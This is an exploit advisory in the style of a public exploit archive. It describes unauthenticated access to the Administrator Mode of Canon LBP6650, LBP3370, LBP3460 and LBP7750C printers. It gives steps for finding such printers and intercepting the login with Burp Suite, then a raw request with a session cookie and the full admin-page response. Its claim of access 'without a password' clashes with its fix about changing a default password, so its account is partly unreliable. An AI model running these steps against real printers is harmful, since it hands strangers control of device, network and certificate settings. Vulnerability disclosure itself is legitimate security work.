# Exploit Title: [ Incorrect Access Control in Canon LBP6650, LBP3370, LBP3460, LBP7750C]
# Date: [3.6.2018]
# Exploit Author: [Huy Kha]
# Vendor Homepage: [http://global.canon.com]
# Software Link: [ Website ]
# Severity: High
# Version: LBP6650, LBP3370, LBP3460, LBP7750C
# Tested on: Mozilla FireFox
# Description : An issue was discovered on Canon LBP6650, LBP3370, LBP3460, LBP7750C printers.
It is possible for a remote (unauthenticated) attacker to bypass the Administrator Mode authentication without a password at any URL of the device that requires authentication.
# PoC :
Start searching for Canon LBP6650 ,LBP3370, LBP3460 printers.
You can recognize them with the /tlogin.cgi parameter, but the version is
also been displayed on the webinterface.
https://imgur.com/a/QE3GfLw
# Example :
1. Go to the following url: http://127.0.0.1/tlogin.cgi
2. Click on Administrator Mode
3. Intercept now the request with Burpsuite and click on 'Ok'' to login.
And forward the request till you get the ''/frame.cgi?page=DevStatus''
parameter.
# Request :
GET /frame.cgi?page=DevStatus HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/tlogin.cgi
Cookie: CookieID=1610705327:; Login=11
Connection: close
Upgrade-Insecure-Requests: 1
# Response :
HTTP/1.1 200 OK
Date: MON, 05 JAN 1970 16:35:57 GMT
Server: CANON HTTP Server
Content-Type: text/html
Content-Length: 5652
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
<meta http-equiv="pragma" content="no-cache"/>
<meta http-equiv="cache-control" content="no-cache,no-store,max-age=0"/>
<meta http-equiv="expires" content="Thu 01 Jan 1970 00:00:00 GMT"/>
<script language="JavaScript">
document.write('<title>Remote UI <');
switch("DevStatus")
{
case "DevStatus":document.write('Status');break;
case "DevError":document.write('Error Information');break;
case "DevUtil":document.write('Utility Menu');break;
case "DevCtrl":document.write('Device Control');break;
case "DevCalib":document.write('Calibration');break;
case "DevInfo":document.write('Device Information');break;
case "DevInfoSetDev":document.write('Change Device Information');break;
case "DevInfoSetSecu":document.write('Change Administrator Settings');break;
case "DevInfoSetIpSecu":document.write('Change IP Address Range');break;
case "DevInfoSetIpv6Secu":document.write('Change IP Address Range');break;
case "DevInfoSetMacSecu":document.write('Change Receiving Permitted MAC
Address');break;
case "DevInfoSetRuiSecu":document.write('Change Remote UI Setting');break;
case "KeyManageSet":document.write('Key and Certificate');break;
case "KeyManageDetail":document.write('Certificate Details');break;
case "KeyManageNewKey":document.write('Generate Key and Certificate');break;
case "KeyManageNewCert":document.write('#&Title_KeyManageNewCert');break;
case "KeyManageKeyInst":document.write('Install Key and Certificate');break;
case "KeyManageKeyPasswd":document.write('Enter Private Key
Password');break;
case "CaManageSet":document.write('CA Certificate');break;
case "CaManageDetail":document.write('Certificate Details');break;
case "CaManageKeyInst":document.write('Install CA Certificate');break;
case "JobHistory":document.write('Job Log Display');break;
case "DevFeature":document.write('Features');break;
case "DevNetwork":document.write('Network');break;
case "DevNetworkSetTcpip":document.write('Change TCP/IP Settings');break;
case "DevNetworkSetNetware":document.write('Change NetWare Settings');break;
case "DevNetworkSetApTalk":document.write('Change AppleTalk
Settings');break;
case "DevNetworkSetSMB":document.write('Change SMB Protocol
Settings');break;
case "DevNetworkSetNetIF":document.write('Change Ethernet Driver
Setting');break;
case "DevNetworkSetSNMP":document.write('Change SNMP Settings');break;
case "DevNetworkSetSNMPV3User":document.write('User Settings');break;
case "DevNetworkSetSNMPV3ConText":document.write('Context Settings');break;
case "DevNetworkSetSNMPV3ConTextSet":document.write('Context
Settings');break;
case "DevNetworkSetSpool":document.write('Change Spooler Setting');break;
case "DevNetworkSetNWakeUp":document.write('Change Startup Time');break;
case "DevNetworkParList":document.write('Parameter List');break;
case "DevNetworkFactDef":document.write('Initialize Network
Settings');break;
case "DevNetworkSetEmail":document.write('Change E-mail Print
Settings');break;
case "EmailRecv":document.write('Receive E-mails');break;
case "DevIDControl":document.write('Department ID Management');break;
case "DevIDSetting":document.write('Department ID Management');break;
case "DevIDRegist":document.write('Department ID Management');break;
case "DevIDEdit":document.write('Department ID Management');break;
case "DevCount":document.write('Counter Check');break;
case "JobPrtProp":document.write('Print Job Details');break;
case "JobPrtSecure":document.write('Unlock');break;
case "JobStore":document.write('Stored Job');break;
case "JobStoreList":document.write('#&Title_JobStoreList');break;
case "JobStoreEnterPwd":document.write('Enter Password');break;
case "JobStoreProp":document.write('Stored Job Details');break;
case "JobStoreExec":document.write('Print Stored Job');break;
case "JobStoreBoxProp":document.write('Change Box Settings');break;
case "JobLog":document.write('Print Log');break;
case "EmailLog":document.write('E-mail Receive Log');break;
case "PdfPrint":document.write('Direct Print');break;
case "PsPrint":document.write('Direct Print');break;
case "ImgPrint":document.write('Direct Print');break;
case "CfgCtrl":document.write('Control Menu');break;
case "CfgCtrlSet":document.write('Change Control');break;
case "CfgCtrlTimeSet":document.write('Change Date and Time');break;
case "CfgPaper":document.write('Paper Source Menu');break;
case "CfgPaperSet":document.write('Change Paper Source');break;
case "CfgLayout":document.write('Layout Menu');break;
case "CfgLayoutSet":document.write('Change Layout');break;
case "CfgQuality":document.write('Quality Menu');break;
case "CfgQualitySet":document.write('Change Quality');break;
case "CfgUserMainte":document.write('User Maintenance Menu');break;
case "CfgUserMainteSet":document.write('Change User Maintenance');break;
case "CfgExpCard":document.write('Extension Card');break;
case "SupLink":document.write('Support Links');break;
case "SupLinkSet":document.write('Edit Support Links');break;
case "Debug":document.write('Debug');break;
case "Syslog":document.write('System Log');break;
default:document.write('');break;
}
document.write('> : LBP6650 ; LBP6650</title>');
var url = new String(document.location);
var ssl = "0";
if( ssl == '1')
{
if(url.match("https") == null )
{
document.location.href = "blank.html";
}
}
</script>
</head>
<frameset cols="185,*" frameborder="NO" border="0" framespacing="0" >
<frame src="/menu.cgi?Type=DEVICE" marginwidth="8" marginheight="0"
name="Index" noresize scrolling="NO">
<frame src="/dstatus.cgi" name="Body">
</frameset>
<noframes>
<body>
</body>
</noframes>
</html>
# Do we have now access to the printer with Admin Mode? : Yes
# How to fix this? : Remove the default password and add a new (strong) password.
# Screenshot : https://imgur.com/a/ISDL1Qf (Administrator Mode)